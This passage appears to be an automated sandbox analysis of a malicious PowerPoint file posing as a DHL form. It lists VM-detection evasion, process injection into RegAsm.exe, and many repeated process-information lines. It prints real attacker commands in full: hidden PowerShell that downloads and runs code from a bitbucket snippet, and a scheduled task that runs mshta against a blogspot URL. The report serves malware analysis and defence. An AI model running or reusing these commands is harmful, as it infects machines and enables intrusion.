Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7044, type: MEMORYSTR
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 64 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 972 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep count: 2607 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep count: 3614 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1430
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5335
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 2607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3614
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.dll
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000016.00000002.517217825.000001ACCCBF0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW>
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW`
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mshta.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.0.cs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\dtsgyyde\dtsgyyde.0.cs
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10E4008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 123E008
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou ''
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
